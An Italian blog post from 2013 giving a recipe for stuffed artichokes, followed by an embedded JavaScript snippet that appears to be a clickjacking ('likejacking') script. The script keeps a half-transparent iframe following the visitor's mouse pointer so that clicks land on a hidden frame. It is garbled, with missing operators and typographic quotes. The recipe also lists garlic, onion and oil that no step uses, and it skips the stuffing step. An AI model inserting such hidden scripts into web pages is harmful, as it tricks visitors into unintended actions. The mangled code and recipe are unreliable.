sabato 5 ottobre 2013

Carciofi farciti in bella vista

INGREDIENTI PER 4 PERSONE

8 carciofi
150gr di besciamella densa
30gr di parmigiano grattugiato
il succo di 2 limoni
1 cucchiaio di prezzemolo tritato
1 uovo
1 cucchiaio di salsa worcester
1 cucchiaio di pangrattato
1 spicchio di aglio
1 pezzetto di cipolla
3 cucchiai di olio extravergine di oliva
1 cucchiaino di pepe in grani
sale q.b.

PREPARAZIONE

Pulite i carciofi eliminando le foglie esterne piu' dure,tagliate le punte e il gambo e tuffateli man man in acqua con meta' succo di limone .Sgocciolateli e cuoceteli per 10min in acqua bollente salata a cui avrete aggiunto il succo di limone rimasto.Scolateli e lasialteli raffreddare capovolti su un telo.Amalgamate la besciamella con il prezzemolo ,il parmigiano .l'uovo,la salsa worcester il pangrattato e un pizzico di sale .Trasferite nella casseruola i carciofi con la farcitura ricolti verso l'alto e cuoceteli per 30 min circa a fuoco basso e coperti.Controllate la cottura pungendo con uno spiedino dovranno essere morbidi Lasciate intiepidire i carciofi ,tagliateli a meta' e disponeteli nel piatto..ecco fatto il piatto e' pronto!! buon appetito!!

text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement typeof d.documentElement.clientWidth == “number” d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. script>